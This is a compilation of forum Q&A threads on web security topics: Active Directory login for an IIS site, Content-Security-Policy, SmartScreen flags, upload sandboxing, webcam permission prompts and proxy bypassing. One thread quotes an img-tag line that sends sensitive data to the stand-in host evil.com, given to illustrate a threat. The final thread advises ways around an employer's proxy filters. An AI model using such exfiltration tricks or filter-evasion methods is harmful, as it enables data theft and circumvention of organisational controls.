Techniques for securing a pure HTML site - html

I have been tasked with securing a pure HTML website for someone, and I'm not entirely sure how to approach the problem. Here are the constraints:
All logins must link in with our current Active Directory domain.
(Optional, but desired) The solution must whitelist requests coming from inside our intranet - that is, if someone attempts to access the site from on campus, they are immediately allowed in.
(Optional, but desired) The solution must whitelist requests made from our hub website, regardless of whether or not they are on campus. Said hub site is secured with logins that reference our Active Directory domain, so this is essentially a request for a passthrough.
The vast majority of our user base is very non-technical, so as small a footprint with few requests for logins is nessecery.
Normally, I'd have no problem with this, but this is a pure HTML website so my options are a little limited. My current ideas:
Use IIS6's Directory Security to simply force Active Directory authentication. I cannot use the IP permit/deny because that check comes before anything else in the life cycle and quickly denies anything on the deny list. I cannot change this behavior.
Code an aspx file that resides on our hub website that pre-loads the integrated Windows security credentials for the user, automatically authenticating them to the HTML website. As far as IIS is concerned, however, these are two different websites and this sounds like bad practice at best and an imitation of a cross-site intrution attempt at worst.
I have to admit I'm stuck. Has anyone ever handled a problem like this before?

Assuming you are using Windows2003/IIS6 and your web server is part of your domain you can do the following:
Configure your website to use Integrated and/or Basic authentication to authenticate against Active Directory. Also disable anonymous access. You'll find these settings by clicking "Edit" in the "Directory Security" tab of your website in IIS Manager. You'll only need to enable Basic if your users will use a browser other than Internet Explorer. If you use Basic your should also use SSL to protect your usernames and passwords. The level of access is determined by the permissions set on the files/directories on your website's root/child directories. Any files within these directories will only be served to authenticated users.
To allow users on your domain to logon without a prompt you will need to configure Internet Explorer to automatically logon to sites within your intranet. You'll also need to enable Integrated authentication for your website in IIS.
I'm not sure if the requirements in item #3 will be met. If your hub website uses impersonation it might pass your Windows credentials to another server within your domain but I suspect not.
References:
"How to configure IIS Web site authentication in Windows Server 2003"
http://support.microsoft.com/kb/324274/
"Internet Explorer May Prompt You for a Password"
http://support.microsoft.com/kb/258063
"How to use security zones in Internet Explorer"
http://support.microsoft.com/kb/174360/EN-US/

If the pure-html site is running on IIS, converting it to a .Net web app just to wrap its resources in your custom conditional forms login using the richer ASP.Net security wrappers seems like a natural enough fit. You can serve the pure HTML files out of that now-application.
This has no downside for the content maintainers that I can see.

Related

How to prevent html in file:/// from accessing internet?

The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?
Please take a look at Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your html by <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow browser to make requests to foreign resources.
The alternative attempt could be developing your project in the form of a browser extension, where you can set up content security policy quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )
As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.
Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).

My site flagged as unsafe by Smartscreen only in Microsoft Edge

My Magento 1.9 webshop is marked as unsafe (phishing which is not true) in Microsoft Edge, if switch to IE and run Smart Screen security check it says all safe.
And strangely only on one of my computers and therefore didn't bother much but also a customer complained about it today.
Anyone experienced this before and have a solution? Is there a way to check why a site is marked as unsafe by smartscreen?
Based on my searching results, Below information may helpful to you.
Q. If I am a website owner, how do I correct a warning on my legitimate site?
A. You can immediately submit a request for a correction. Windows Defender SmartScreen has a built-in, web-based feedback system in place to help customers and website owners report any potential false warnings as quickly as possible. In Windows Internet Explorer, from a red warning, click More information then Report that this site contains no threats. This will take you to a feedback page where you can indicate you are a site owner or representative. Follow the instructions and provide the information on this site to submit a site for review...
Reference:
Resolving “This website has been reported as unsafe” (Windows Defender SmartScreen)
Q.
If I am a website owner, what can I do to help minimize the chance of my website being flagged by Windows Defender SmartScreen?
A.
There are several things you can do that can help minimize the chance of your site being flagged as suspicious. Think of these as best practices or optimal website design ethics.
If you ask users for personal information, use HTTPS with a valid, unexpired server certificate issued by a trusted certification authority.
Make sure that your webpage doesn't expose any cross-site scripting (XSS) vulnerabilities. Protect your site by using anti-cross-site scripting functions such as those provided by the Microsoft Anti-Cross Site Scripting library.
Use the fully-qualified domain name rather than an IP-literal address. (This means a URL should look like "microsoft.com" and not "207.46.19.30.")
Don't encode or tunnel your URLs unnecessarily. If you don't know what this means, you probably aren't doing it.
If you post external or third-party hosted content, make sure that the content is secure and from a known and trusted source.
Reference:
Windows Defender SmartScreen Frequently Asked Questions
In MS Edge browser there's an option to "report file as safe". After clicking it - select the "I'm a website owner" option and fill the false-positive form.

Why does MDN recommend sandboxing uploading files to a different (sub)domain?

Mozilla Development Network recommends sandboxing uploaded files to a different subdomain:
Sandbox uploaded files (store them on a different server and allow
access to the file only through a different subdomain or even better
through a fully different domain name).
I don't understand what additional security this would provide; my approach has been to upload files on the same domain as the web page with the <input> form control, restrict uploaded files to a particular directory and perform antivirus scans on them, and then allow access to them on the same domain they were uploaded to.
There's practical/performance reasons and security reasons.
From a practical/performance reason, unless you are on a budget, store your files on a system optimised for performance. This can be any type of CDN if you are serving them once uploaded, or just isolated upload-only servers. You can do this yourself, or better off you can use something like AWS S3 and customise the permissions to your needs.
From a security point of view, it is incredibly hard to protect an uploaded file from being executable, specially if you are using a server side scripting language. There are many methods, both in HTTP and in the most popular HTTP servers (nginx, apache, ...) to harden things and make them secure, but there is so many things that you have to take into account and another bunch that you would never even think about, that it is much safer to just leave your files somewhere else altogether, ideally where there's no scripting engine that could run script code on them.
I assume that the different subdomain or domain recommendation is about XSS, vulns exploiting bad configurations of CORS, prevention on phishing attempts (like someone successfully uploading content to your site that mimics your site but does something nasty such as stealing user credentials or providing fake information, and the site would still be served from your domain and there wouldn't be an https security alert from the certificate either).

How to capture image with html5 webcam without security prompt

I need to capture image from web page without security warning.
Page where i need webcam functionality can not be switched to https protocol.
I've installed root certificates and made them trusted.
I tried to insert iframe (which pointed to secure protocol https://mysecurepage.com) inside page (http://mypage.com), but not worked.
#bjelli is correct - this is a major security flaw for any internet content. Just imagine if you could go to a website which would start taking photos/recording everything going on without any permissions or notifications!
However, I am working on an intranet project where disabling the prompt would be quite safe.
If you are in this sort of position - there is one thing you can do;
Google Chrome Policies
If you are deploying the browser, you can override the security prompt for sites you specify. I don't know if you are working in such an environment, but this is the only way you can avoid the prompt all together. Similar things probably would apply for other browsers too.
As defined in http://www.w3.org/TR/mediacapture-streams/
When the getUserMedia() method is called, the user agent MUST run the following
steps:
[9 steps omitted]
Prompt the user in a user agent specific manner for permission to provide the
entry script's origin with a MediaStream object representing a media stream.
[...]
If the user grants permission to use local recording devices, user agents are
encouraged to include a prominent indicator that the devices are "hot" (i.e. an
"on-air" or "recording" indicator).
If the user denies permission, jump to the step labeled failure below. If the
user never responds, this algorithm stalls on this step.
If a browser does not behave as described here it is a serious security problem. If you find a way of making a browser skip the "permission" you have found a security problem.
What do you do if you find a security problem?
Report it IMMEDIATELY! Wikipedia: Vulnerability Disclosure
Firefox: http://www.mozilla.org/security/#For_Developers
Internet Explorer: http://technet.microsoft.com/en-us/security/ff852094.aspx
Safari: https://ssl.apple.com/support/security/
Chrome: http://www.google.com/about/appsecurity/
Opera: http://www.opera.com/security/policy
This is not just a question of technical possibilities, it's also a question of
professional ethics: what kind of job would I not take on? should I be
loyal to my customer or should I think of the welfare of the public? when do I
just follow orders, when do I stop bad stuff from happening, when do I blow the whistle?
Here are some starting points for computing professionals to think about the ethics of their work:
http://www.acm.org/about/se-code
http://www.acm.org/about/code-of-ethics
http://www.ieee.org/about/corporate/governance/p7-8.html
http://www.gi.de/?id=120

web page needed for bypassing proxy restricted sites

I am looking for ways to browse sites that are blocked by proxy filters at my location.
One solution i came up with was to build a page that would take a input of a URL and display the site in an iframe. Thus i would have a window into a browser on a page that is being displayed by my proxy. I was going to host this on my personal web site and use it to access restricted content. this way i have access to blogs, and forums where there is a wealth of information that is blocked by a backwards blanketed restriction list.
How can i make a web page similar to this? Would it be simple html and javascript, do I need .Net?
What you aim to do has to be done server-side. When you put a page in an iframe, your web browser loads it, and will do so just as if you went directly to the URL.
There is no way around this via client-side code, such as JavaScript.
If you truly want to reinvent the wheel, pick a language and look into whatever functions download files. No need to do this though when there are plenty of web-based proxy services, such as http://www.hidemyass.com.
Even if you loaded it in an iframe, the request for the page in the iframe will still go through the proxy and so you will still be blocked.
You'd have to do something like open a socket to the site through your web host and then download the content and redisplay it. That's assuming your host isn't also blocked. Also, you'll lose the benefits of cookies and sessions this way (ie. you won't be able to be logged into things unless the session id is in the query string).
The fastest and simplest solution would be to create a free Log Me In account at www.logmein.com. then setup your host computer at home, login from work, and browse freely. I do this myself at work so no one can see my personal browsing history when I dont want them to. This of course would only work if logmein.com was not a blocked site at your work. good luck!
It depends upon the "filter" complexity. If you have your own website that you can reach through the proxy or if your computer can run as a webserver, you could try accessing via a proxy script such as "CGIProxy." There are online services that do this too. However, some proxy filters can detect these methods as well and you'd still be out of luck. No javascript or HTML tricks can overcome the proxy filter.